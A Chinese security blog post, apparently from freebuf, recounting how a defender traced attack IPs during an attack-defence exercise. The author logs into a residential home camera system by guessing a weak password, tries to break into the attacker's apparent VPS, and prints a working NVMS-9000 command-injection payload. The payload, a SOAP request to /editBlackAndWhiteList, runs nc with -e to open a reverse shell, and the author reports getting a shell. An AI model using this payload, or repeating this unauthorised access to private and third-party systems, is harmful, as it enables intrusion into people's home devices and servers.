从溯源中学到新姿势 – 作者:hahali

起因

HVV期间在防火墙上抓取到了几个攻击IP。作为防守人员,甲方爸爸自然把这些IP拿给我们进行溯源(我。。。)

溯源

查询这几个地址,发现均为台湾IP(IP太多了,就拿一个举例吧。。。)

1605070405_5fab6e457ff3b6e9827ef.png!small?1605070406993

微步查询为傀儡机

1605070532_5fab6ec41c2721c400d97.png!small?1605070533551

对直接攻击源进行端口探测,发现其开放RTSP和HTTP业务,访问直接攻击源的80端口,发现一个登录界面。尝试弱口令登录成功,通过观察为居民家庭的安保监控系统。

1605070852_5fab7004090f0db10d60c.png!small?1605070858356

在这个监控系统中发现有NC反弹shell的命令,分析是攻击者拿到监控设备服务器后作为肉鸡进行攻击,NC反弹命令中有攻击者IP

1605071222_5fab7176cc9524905bc38.png!small?1605071224298

查询IP地址为美国,对其端口探测,发现其开放的SSH服务和HTTP业务,访问直接攻击源的80端口,发现一个apache界面,判断此IP可能是攻击者的VPS服务器,经过初步尝试,暂时没有发现获取权限的方式,无法深入(就是自己菜。。。)

1605071475_5fab72731522a3dd22022.png!small?1605071476590

1605071443_5fab7253ed68ed4e302bd.png!small?1605071445616

分析监控

既然无法深入,那转头研究一下攻击者是怎么拿到监控摄像头权限的吧

对监控界面抓包发现了摄像头型号

1605072003_5fab748364b0e18fa75b6.png!small?1605072004824

百度查找发现此型号存在一个RCE漏洞

https://www.secrss.com/articles/14661

使用base64管理员凭证向/editBlackAndWhiteList路径发送SOAP格式的HTTP POST请求,body中含有命令执行,尝试在摄像头上使用nc命令建立一个反向shell,将流量重定向到远程服务器的31337/TCP端口上

EXP如下:

<?xml version=”1.0″ encoding=”utf-8″?>
<request version=”1.0″ systemType=”NVMS-9000″ clientType=”WEB”>
<types>
<filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode>
<addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType>
</types>
<content>
<switch>true</switch>
<filterType type=”filterTypeMode”>refuse</filterType>
<filterList type=”list”><itemType><addressType type=”addressType”/></itemType>
<item><switch>true</switch><addressType>ip</addressType>
<ip>$(nc${IFS}IP${IFS}1234${IFS}-e${IFS}$SHELL&)</ip>
</item>
</filterList>
</content>
</request>

1605072368_5fab75f0caa43b97b4f78.png!small?1605072370370

获取shell

1605072206_5fab754e56c84265b2ab8.png!small?1605072208108

来源:freebuf.com 2020-11-11 13:35:03 by: hahali

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论